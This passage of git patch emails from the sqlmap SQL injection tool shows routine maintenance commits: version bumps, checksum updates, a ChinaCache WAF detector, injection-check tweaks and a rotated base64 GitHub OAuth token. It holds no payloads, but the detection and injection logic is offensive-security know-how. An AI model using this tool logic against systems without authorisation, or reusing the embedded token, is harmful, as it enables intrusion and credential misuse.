plugins/dbms/h2/enumeration.py 36522c36650afc43c1166ab68b297ecb plugins/dbms/h2/filesystem.py -4fe530d10b74210bd045205d9318b5d6 plugins/dbms/h2/fingerprint.py +83255ebf7b1d23a408f0c68a7fa63422 plugins/dbms/h2/fingerprint.py 1de698e4cfddd754ffe31ea2640a481a plugins/dbms/h2/__init__.py 4673ebfdce9859718c19e8a7765da8d3 plugins/dbms/h2/syntax.py af746ef421cfefedc1aaa9dca1503de2 plugins/dbms/h2/takeover.py From ef52ee977fe43851c0b6549bb0e14db3e2426944 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 27 Oct 2018 14:14:21 +0200 Subject: [PATCH 343/428] Minor patch --- lib/core/common.py | 3 +++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 3 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index da760545802..69c4014677d 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3481,6 +3481,9 @@ def maskSensitiveData(msg): for match in re.finditer(r"(?i)[ -]-(u|url|data|cookie)( |=)(.*?)(?= -?-[a-z]|\Z)", retVal): retVal = retVal.replace(match.group(3), '*' * len(match.group(3))) + # Fail-safe substitution + retVal = re.sub(r"(?i)\bhttps?://[^ ]+", lambda match: '*' * len(match.group(0)), retVal) + if getpass.getuser(): retVal = re.sub(r"(?i)\b%s\b" % re.escape(getpass.getuser()), '*' * len(getpass.getuser()), retVal) diff --git a/lib/core/settings.py b/lib/core/settings.py index 73ff938cb5e..68d761779d2 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.36" +VERSION = "1.2.10.37" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 00c2a7fc11b..f823b935845 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -ce7fb7270b104f05d1e2be088b69c976 lib/core/common.py +d20b9dd6097701b08153e80dc9b7eec6 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -12fb6b20891ff3949db01fa2c1c1286a lib/core/settings.py +07e1402306b18144c9a4d2e1e43ce9d0 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 703b7079a47c69ebefd27ada38b303d9b181f250 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 27 Oct 2018 14:30:28 +0200 Subject: [PATCH 344/428] Fixes #3319 --- lib/core/option.py | 9 +++++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 12 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 379eed0ddc0..1f37b48e9b6 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1367,6 +1367,14 @@ def _setHTTPCookies(): conf.httpHeaders.append((HTTP_HEADER.COOKIE, conf.cookie)) +def _setHostname(): + """ + Set value conf.hostname + """ + + if conf.url: + conf.hostname = urlparse.urlsplit(conf.url).netloc.split(':')[0] + def _setHTTPTimeout(): """ Set the HTTP timeout @@ -2479,6 +2487,7 @@ def init(): parseTargetDirect() if any((conf.url, conf.logFile, conf.bulkFile, conf.sitemapUrl, conf.requestFile, conf.googleDork, conf.liveTest)): + _setHostname() _setHTTPTimeout() _setHTTPExtraHeaders() _setHTTPCookies() diff --git a/lib/core/settings.py b/lib/core/settings.py index 68d761779d2..69dd4a67e72 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.37" +VERSION = "1.2.10.38" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index f823b935845..51d66d01763 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 @@ cada93357a7321655927fc9625b3bfec lib/core/exception.py 1e5532ede194ac9c083891c2f02bca93 lib/core/__init__.py 458a194764805cd8312c14ecd4be4d1e lib/core/log.py 7d6edc552e08c30f4f4d49fa93b746f1 lib/core/optiondict.py -18f33e43a09f5d682b92ca63baacd531 lib/core/option.py +d6dace6468ed5d2bbd500b0a244a9650 lib/core/option.py c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 6783160150b4711d02c56ee2beadffdb lib/core/profiling.py 6f654e1715571eff68a0f8af3d62dcf8 lib/core/readlineng.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -07e1402306b18144c9a4d2e1e43ce9d0 lib/core/settings.py +dc1382ae6b5899619d11d972435c6bd2 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From cc4833429fedf31f719ad8822f884a1deac5bf5a Mon Sep 17 00:00:00 2001 From: Syed Afzal Date: Mon, 29 Oct 2018 14:21:18 +0530 Subject: [PATCH 345/428] added china cache (#3326) --- waf/chinacache.py | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 waf/chinacache.py diff --git a/waf/chinacache.py b/waf/chinacache.py new file mode 100644 index 00000000000..aaac5c751b4 --- /dev/null +++ b/waf/chinacache.py @@ -0,0 +1,25 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) +See the file 'doc/COPYING' for copying permission +""" + +import re + +from lib.core.enums import HTTP_HEADER +from lib.core.settings import WAF_ATTACK_VECTORS + +__product__ = "China Cache" + +def detect(get_page): + retval = False + + for vector in WAF_ATTACK_VECTORS: + page, headers, code = get_page(get=vector) + retval = headers.get("Powered-By-ChinaCache") is not None + + if retval: + break + + return retval \ No newline at end of file From db5ae9ae0bb871a157482ba48d0dfd37fc26f6f8 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 29 Oct 2018 09:55:14 +0100 Subject: [PATCH 346/428] Minor update to #3326 (adding generic code >= 400) --- lib/core/settings.py | 2 +- txt/checksum.md5 | 3 ++- waf/chinacache.py | 7 ++----- 3 files changed, 5 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 69dd4a67e72..bb05f2f6c19 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.38" +VERSION = "1.2.10.39" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 51d66d01763..d0cd89427a3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -dc1382ae6b5899619d11d972435c6bd2 lib/core/settings.py +052f65076ec02852b0035f1ac0d20240 lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -408,6 +408,7 @@ ef722d062564def381b1f96f5faadee3 waf/baidu.py 44f724ab7d333397975fecdf7e50be56 waf/bigip.py 6a2834daf767491d3331bd31e946d540 waf/binarysec.py 41e399dbfe7b904d5aacfb37d85e1fbf waf/blockdos.py +c52c6974c0dae6815f27cfdee6121d7b waf/chinacache.py 2f3bbf43be94d4e9ffe9f80e8483d62f waf/ciscoacexml.py ba84f296cb52f5e78a0670b98d7763fa waf/cloudbric.py a1d16d7106c9c66072aa58530c288515 waf/cloudflare.py diff --git a/waf/chinacache.py b/waf/chinacache.py index aaac5c751b4..d4d2d5aaebb 100644 --- a/waf/chinacache.py +++ b/waf/chinacache.py @@ -5,19 +5,16 @@ See the file 'doc/COPYING' for copying permission """ -import re - -from lib.core.enums import HTTP_HEADER from lib.core.settings import WAF_ATTACK_VECTORS -__product__ = "China Cache" +__product__ = "ChinaCache (ChinaCache Networks)" def detect(get_page): retval = False for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) - retval = headers.get("Powered-By-ChinaCache") is not None + retval = code >= 400 and headers.get("Powered-By-ChinaCache") is not None if retval: break From 130879fbf3d1bfd98ede81d595c66314a8835082 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 30 Oct 2018 10:37:39 +0100 Subject: [PATCH 347/428] Minor patches --- lib/core/settings.py | 4 ++-- sqlmap.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index bb05f2f6c19..049c275a8d1 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.39" +VERSION = "1.2.10.40" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) @@ -593,7 +593,7 @@ FORCE_COOKIE_EXPIRATION_TIME = "9999999999" # Github OAuth token used for creating an automatic Issue for unhandled exceptions -GITHUB_REPORT_OAUTH_TOKEN = "NTMyNWNkMmZkMzRlMDZmY2JkMmY0MGI4NWI0MzVlM2Q5YmFjYWNhYQ==" +GITHUB_REPORT_OAUTH_TOKEN = "NTYzYjhmZWJjYzc0Njg2ODJhNzhmNDg1YzM0YzlkYjk3N2JiMzE3Nw==" # Skip unforced HashDB flush requests below the threshold number of cached items HASHDB_FLUSH_THRESHOLD = 32 diff --git a/sqlmap.py b/sqlmap.py index c8b9fc81f17..c6f6194d1bb 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -234,8 +234,8 @@ def main(): dataToStdout(excMsg) raise SystemExit - elif "ImportError" in excMsg: - errMsg = "invalid runtime environment ('%s')" % excMsg.split("ImportError: ")[-1].strip() + elif any(_ in excMsg for _ in ("ImportError", "Can't find file for module")): + errMsg = "invalid runtime environment ('%s')" % excMsg.split("Error: ")[-1].strip() logger.critical(errMsg) raise SystemExit diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d0cd89427a3..bb2d1fb642f 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -052f65076ec02852b0035f1ac0d20240 lib/core/settings.py +c0109f21b79e9867dede075afad9167f lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py @@ -234,7 +234,7 @@ ec2ba8c757ac96425dcd2b97970edd3a shell/stagers/stager.asp_ 0c48ddb1feb7e38a951ef05a0d48e032 shell/stagers/stager.jsp_ 2f9e459a4cf6a58680978cdce5ff7971 shell/stagers/stager.php_ cd90da0474d7b1a67d7b40d208493375 sqlmapapi.py -b84c70803012a374385ecc3e41a7e0dc sqlmap.py +ad5f9980c9bdca753578292720a5afe0 sqlmap.py 523dab9e1093eb59264c6beb366b255a tamper/0x2char.py 3a1697585ae4e7bf315e9dda97d6f321 tamper/apostrophemask.py d7a119a74be9b385ee3884fb5e6af041 tamper/apostrophenullencode.py From a4fdbf1343ca2805c91a2669f4f0fad4236f9433 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 30 Oct 2018 11:13:09 +0100 Subject: [PATCH 348/428] Patch related to the #3348 --- lib/core/settings.py | 2 +- lib/core/shell.py | 45 +++++++++++++++++++++++--------------------- txt/checksum.md5 | 4 ++-- 3 files changed, 27 insertions(+), 24 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 049c275a8d1..20013c7f427 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.40" +VERSION = "1.2.10.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/core/shell.py b/lib/core/shell.py index 7eeef4ee5c7..d9fb4f59091 100644 --- a/lib/core/shell.py +++ b/lib/core/shell.py @@ -53,30 +53,33 @@ def clearHistory(): readline.clear_history() def saveHistory(completion=None): - if not readlineAvailable(): - return - - if completion == AUTOCOMPLETE_TYPE.SQL: - historyPath = paths.SQL_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.OS: - historyPath = paths.OS_SHELL_HISTORY - elif completion == AUTOCOMPLETE_TYPE.API: - historyPath = paths.API_SHELL_HISTORY - else: - historyPath = paths.SQLMAP_SHELL_HISTORY - try: - with open(historyPath, "w+"): + if not readlineAvailable(): + return + + if completion == AUTOCOMPLETE_TYPE.SQL: + historyPath = paths.SQL_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.OS: + historyPath = paths.OS_SHELL_HISTORY + elif completion == AUTOCOMPLETE_TYPE.API: + historyPath = paths.API_SHELL_HISTORY + else: + historyPath = paths.SQLMAP_SHELL_HISTORY + + try: + with open(historyPath, "w+"): + pass + except: pass - except: - pass - readline.set_history_length(MAX_HISTORY_LENGTH) - try: - readline.write_history_file(historyPath) - except IOError, msg: - warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) - logger.warn(warnMsg) + readline.set_history_length(MAX_HISTORY_LENGTH) + try: + readline.write_history_file(historyPath) + except IOError, msg: + warnMsg = "there was a problem writing the history file '%s' (%s)" % (historyPath, msg) + logger.warn(warnMsg) + except KeyboardInterrupt: + pass def loadHistory(completion=None): if not readlineAvailable(): diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bb2d1fb642f..3a2d3b80eb6 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,8 +49,8 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -c0109f21b79e9867dede075afad9167f lib/core/settings.py -dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py +ffe74b003e5ac912c6be33956d9245db lib/core/settings.py +a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py 72d499ca8d792e90a1ebfb2ad2341a51 lib/core/testing.py From 1bd8c519c333a829e99db9c140f130464c6d79d5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Tue, 30 Oct 2018 15:41:39 +0100 Subject: [PATCH 349/428] Minor just in case update --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 69c4014677d..d65cdbbfd32 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -3545,7 +3545,7 @@ def _(value): return value payload = getUnicode(urldecode(payload.replace(PAYLOAD_DELIMITER, ""), convall=True)) - regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string-escape"))) + regex = _(filterStringValue(payload, r"[A-Za-z0-9]", REFLECTED_REPLACEMENT_REGEX.encode("string_escape"))) if regex != payload: if all(part.lower() in content.lower() for part in filter(None, regex.split(REFLECTED_REPLACEMENT_REGEX))[1:]): # fast optimization check diff --git a/lib/core/settings.py b/lib/core/settings.py index 20013c7f427..ac300f10822 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.41" +VERSION = "1.2.10.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 3a2d3b80eb6..bbb470c00da 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -d20b9dd6097701b08153e80dc9b7eec6 lib/core/common.py +83cb02b7fbb979b8c27e7fc58c76e6f1 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -ffe74b003e5ac912c6be33956d9245db lib/core/settings.py +6b82f332dca4d40708884fccaee79a7f lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 73d83280fe21542eaa328c7a3668dcddce53c7ba Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:24:36 +0100 Subject: [PATCH 350/428] Minor patch (bounded injection case with leftover marker) --- lib/controller/checks.py | 7 ++++--- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 6 deletions(-) diff --git a/lib/controller/checks.py b/lib/controller/checks.py index d0f9a8b1018..69e03c5cd34 100644 --- a/lib/controller/checks.py +++ b/lib/controller/checks.py @@ -74,6 +74,7 @@ from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSkipTargetException from lib.core.exception import SqlmapUserQuitException +from lib.core.settings import BOUNDED_INJECTION_MARKER from lib.core.settings import CANDIDATE_SENTENCE_MIN_LENGTH from lib.core.settings import CHECK_INTERNET_ADDRESS from lib.core.settings import CHECK_INTERNET_VALUE @@ -361,7 +362,7 @@ def checkSqlInjection(place, parameter, value): # Parse test's comment = agent.getComment(test.request) if len(conf.boundaries) > 1 else None - fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + fstPayload = agent.cleanupPayload(test.request.payload, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) for boundary in boundaries: injectable = False @@ -472,13 +473,13 @@ def checkSqlInjection(place, parameter, value): # payload was successful # Parse test's for method, check in test.response.items(): - check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + check = agent.cleanupPayload(check, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) # In case of boolean-based blind SQL injection if method == PAYLOAD.METHOD.COMPARISON: # Generate payload used for comparison def genCmpPayload(): - sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) else None) + sndPayload = agent.cleanupPayload(test.response.comparison, origValue=value if place not in (PLACE.URI, PLACE.CUSTOM_POST, PLACE.CUSTOM_HEADER) and BOUNDED_INJECTION_MARKER not in (value or "") else None) # Forge response payload by prepending with # boundary's prefix and appending the boundary's diff --git a/lib/core/settings.py b/lib/core/settings.py index ac300f10822..286aee12821 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.42" +VERSION = "1.2.11.0" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bbb470c00da..eaa95a64e2e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -23,7 +23,7 @@ b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py -fab20cff41611d4fcb4e426e2c7704da lib/controller/checks.py +71334197c7ed28167cd66c17b2c21844 lib/controller/checks.py dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 97a0f363bfc33a5ee4853cdf91515423 lib/controller/handler.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6b82f332dca4d40708884fccaee79a7f lib/core/settings.py +9aa489d9226056b672d83786f2c606c9 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From 1d6832a84aff4c787e2998b36fb3b5f3cdf6c5a6 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:41:33 +0100 Subject: [PATCH 351/428] Cosmetic update (not patch) related to the #3354 --- lib/core/common.py | 2 +- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index d65cdbbfd32..e2421394860 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -645,7 +645,7 @@ def walk(head, current=None): current[key] = "%s%s" % (getUnicode(value).lower(), BOUNDED_INJECTION_MARKER) else: current[key] = "%s%s" % (value, BOUNDED_INJECTION_MARKER) - candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized), parameters) + candidates["%s (%s)" % (parameter, key)] = re.sub(r"\b(%s\s*=\s*)%s" % (re.escape(parameter), re.escape(testableParameters[parameter])), r"\g<1>%s" % json.dumps(deserialized, separators=(',', ':') if ", " not in testableParameters[parameter] else None), parameters) current[key] = original deserialized = json.loads(testableParameters[parameter]) diff --git a/lib/core/settings.py b/lib/core/settings.py index 286aee12821..becbce944de 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.0" +VERSION = "1.2.11.1" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index eaa95a64e2e..bd5bf0be6d5 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ dd42ef140ffc0bd517128e6df369ab01 lib/controller/controller.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py cb865cf6eff60118bc97a0f106af5e4d lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -83cb02b7fbb979b8c27e7fc58c76e6f1 lib/core/common.py +56c793e54bcd3292a397288ba6ab5f35 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -9aa489d9226056b672d83786f2c606c9 lib/core/settings.py +3458bf3578ed237c8bb70684288e5cbe lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 721198b5be72c8015a02acb116532a1f lib/core/target.py From dbdfbcc42506ffe73fa718cf5f51bf13726c1ab0 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Thu, 1 Nov 2018 22:59:20 +0100 Subject: [PATCH 352/428] Adding dates to the start/end time --- lib/core/settings.py | 2 +- sqlmap.py | 4 ++-- txt/checksum.md5 | 4 ++-- 3 files changed, 5 insertions(+), 5 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index becbce944de..f98366e13b8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.11.1" +VERSION = "1.2.11.2" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.py b/sqlmap.py index c6f6194d1bb..fb126c7ae6a 100755 --- a/sqlmap.py +++ b/sqlmap.py @@ -141,7 +141,7 @@ def main(): conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) - dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) + dataToStdout("[*] starting @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) init() @@ -357,7 +357,7 @@ def main(): kb.threadContinue = False if conf.get("showTime"): - dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) + dataToStdout("\n[*] ending @ %s\n\n" % time.strftime("%X /%Y-%m-%d/"), forceOutput=True) kb.threadException = True diff --git a/txt/checksum.md5 b/txt/checksum.md5 index bd5bf0be6d5..4f7da47b721 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -3458bf3578ed237c8bb70684288e5cbe lib/core/settings.py 